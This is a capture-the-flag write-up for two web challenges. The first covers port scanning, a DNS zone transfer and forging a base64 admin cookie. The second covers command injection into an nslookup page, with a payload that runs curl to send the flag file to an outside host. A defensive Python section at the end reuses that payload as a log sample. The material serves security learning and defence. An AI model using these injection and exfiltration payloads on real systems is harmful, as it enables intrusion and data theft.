CTF Information
- Name: Monthly CTF Nov.
- Website: http://124.16.75.162:40002
- Type: Online
- Format: Jeopardy
Web1 I heard your company has a secret entrance
Description
tips1: Secret port (40001-40009)
tips2: Scan directories
tips3: Pay attention to the domain name
tips4: The secret port serves a vulnerable DNS service
tips5: I heard anyone who does not access it by domain name is a bad guy
http://124.16.75.162:40005
Solution
According to the hints, try to scan the ports:
40001/tcp filtered unknown
40002/tcp open unknown
40003/tcp open unknown
40004/tcp filtered unknown
40005/tcp open unknown
40006/tcp open unknown
40007/tcp closed unknown
40008/tcp closed unknown
40009/tcp open unknown
Focus on the filtered port (40001) and on 40003.
Then scan the website for directories. This turns up readme.txt and a directory named upload, which contains only a favicon.
Reading readme.txt: the file says the site should be accessed in a different way, and a domain name, bluectf.com, appears in it.
However, bluectf.com is not registered, and tips4 says that the DNS server is running on one of the secret ports.
Try dig to resolve bluectf.com against that specific DNS server:
dig @124.16.75.162 bluectf.com -p 40003
This shows Connection timed out, so use TCP instead of UDP:
dig @124.16.75.162 bluectf.com -p 40003 +tcp -t ANY
And got the result:
; <<>> DiG 9.8.3-P1 <<>> @124.16.75.162 bluectf.com -p 40003 +tcp -t ANY
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1610
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 2, AUTHORITY: 0, ADDITIONAL: 0
;; QUESTION SECTION:
;bluectf.com. IN ANY
;; ANSWER SECTION:
bluectf.com. 86400 IN SOA localhost. root.localhost. 1 604800 86400 2419200 86400
bluectf.com. 86400 IN NS bluedns.
;; Query time: 1 msec
;; SERVER: 124.16.75.162#40003(124.16.75.162)
;; WHEN: Sun Nov 20 12:05:26 2016
;; MSG SIZE rcvd: 100
The description says that the DNS server is vulnerable, and the answer contains an SOA record, so try the SOA weakness, an AXFR zone transfer:
dig @124.16.75.162 axfr bluectf.com -p 40003 +tcp
Got:
; <<>> DiG 9.8.3-P1 <<>> @124.16.75.162 axfr bluectf.com -p 40003 +tcp
; (1 server found)
;; global options: +cmd
bluectf.com. 86400 IN SOA localhost. root.localhost. 1 604800 86400 2419200 86400
bluectf.com. 86400 IN NS bluedns.
bluedns.bluectf.com. 86400 IN A 124.16.75.162
flag1.bluectf.com. 86400 IN TXT "see http://bluedns.bluectf.com/flag_1_flag_123456.php"
bluectf.com. 86400 IN SOA localhost. root.localhost. 1 604800 86400 2419200 86400
;; Query time: 1 msec
;; SERVER: 124.16.75.162#40003(124.16.75.162)
;; WHEN: Sun Nov 20 12:15:27 2016
;; XFR size: 5 records (messages 1, bytes 232)
The TXT record tells where the flag is; however, the website must be accessed by domain name, not by IP address, so add an entry to the hosts file:
124.16.75.162 bluedns.bluectf.com
And access: http://bluedns.bluectf.com:40005/flag_1_flag_123456.php
Capture the request: it carries a Cookie whose value is the base64 encoding of the string guest. Change it to the base64 encoding of the string admin.
And got the flag: bluectf{zone_transfer_in_dns}
Web2 Keep going
Description
tips1: Look at index.php
tips2: There is no output echo, so what now?
Solution
Look at the page index.php. It asks the user for a host address, sends it via GET, and returns the nslookup result.
So it looks like command concatenation. Try chaining other commands with ;, | or &, and so on; & succeeds.
Using cat to show the flag prints nothing (no output echo), so exfiltrate the flag through a web server log instead.
Payload:
/index.php?host=127.0.0.1%26curl%20xxx.com%2f%60cat%20%2ftmp%2fflag%60
It shows the flag:
flag: bluectf{R3m0t3_C0d3_3x3cuti0n_in_ns100kup}
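As an added, defensive example (not code from the writeup or the challenge server), here is how a lookup page like index.php could be hardened and how the Web2 payload shows up in an access log: a strict host allow-list, an nslookup invocation that never passes through a shell, and a scan over constructed log lines for URL-encoded shell metacharacters in the host parameter. The function names, regexes and sample log lines are assumptions.

```python
import ipaddress
import re
from urllib.parse import unquote

# RFC 1123 hostname: dot-separated labels of letters, digits and hyphens.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
_HOSTNAME = re.compile(rf"(?:{_LABEL}\.)*{_LABEL}\.?")
# Characters a shell treats specially; none of them belong in a host name.
_SHELL_META = re.compile(r"[;&|`$(){}<>\n]")

def is_safe_host(value):
    """Allow-list check: accept only an IP literal or a well-formed hostname."""
    if not value or len(value) > 253:
        return False
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return _HOSTNAME.fullmatch(value) is not None

def nslookup_argv(host):
    """Argument vector for nslookup. A list passed to subprocess.run with
    shell=False makes '&', ';' and backticks ordinary bytes inside one
    argument instead of command separators; unsafe input is rejected first."""
    if not is_safe_host(host):
        raise ValueError("rejected host parameter: %r" % host)
    return ["nslookup", host]

def flag_injection_attempts(log_lines):
    """Return (client_ip, decoded host) for every /index.php request whose
    host= parameter contains shell metacharacters after URL decoding."""
    pattern = re.compile(r'^(\S+) .*"GET /index\.php\?(?:[^" ]*&)?host=([^" &]*)')
    hits = []
    for line in log_lines:
        m = pattern.search(line)
        if m is None:
            continue
        host = unquote(m.group(2))
        if _SHELL_META.search(host):
            hits.append((m.group(1), host))
    return hits

# Constructed sample access-log lines (not from the challenge server); the
# second carries the writeup's payload, URL-encoded as the web server logs it.
SAMPLE_LOG = [
    '10.0.0.5 - - [20/Nov/2016:12:30:01 +0800] "GET /index.php?host=example.com HTTP/1.1" 200 512',
    '10.0.0.9 - - [20/Nov/2016:12:31:17 +0800] "GET /index.php?host=127.0.0.1%26curl%20xxx.com%2f%60cat%20%2ftmp%2fflag%60 HTTP/1.1" 200 0',
]
```

Running flag_injection_attempts(SAMPLE_LOG) reports only the second client, with the host parameter decoded to the chained command from the writeup.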